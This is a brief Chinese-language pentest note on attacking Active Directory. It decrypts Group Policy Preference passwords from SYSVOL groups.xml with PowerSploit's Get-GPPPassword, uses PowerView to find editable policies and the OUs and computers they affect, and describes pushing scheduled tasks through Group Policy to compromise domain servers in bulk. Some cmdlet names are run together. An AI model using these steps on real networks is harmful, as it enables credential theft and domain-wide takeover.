这个原因是因为组策略模板GPT的存储位置位于域控制器的%systemroot%\sysvol\sysvol\域名\Policies 文件夹内,而且任何用户都可以访问该文件夹
而且组策略是可以解密的(由于微软公布了私钥)
比如拿到groups.xml
利用PowerSpoloit中的Get-GPPPassword.ps1可以解密
# powershell exec
Import-Module .\\Get-GPPPassword.ps1
Get-GPPPassword
Import-Module .\\PowerView.ps1
Invoke-ACLScanner -ResolveGUIDs -ADSpath "CN=Policies, CN=System, DC=xie, DC=com" -verbose
然后查看该组策略可能影响哪个OU下的用户/计算机
Get-NetOU-GUID B08E4C8C-581C-4421-973C-47D01E455623 | %{Get-NetUser-ADSpath $_}
Get-NetOU-GUID B08E4C8C-581C-4421-973C-47D01E455623 | %{Get-Netcomputer-ADSpath $_}
知道有edit权限之后就可以利用组策略创建定时任务,然后批量域服务器上线
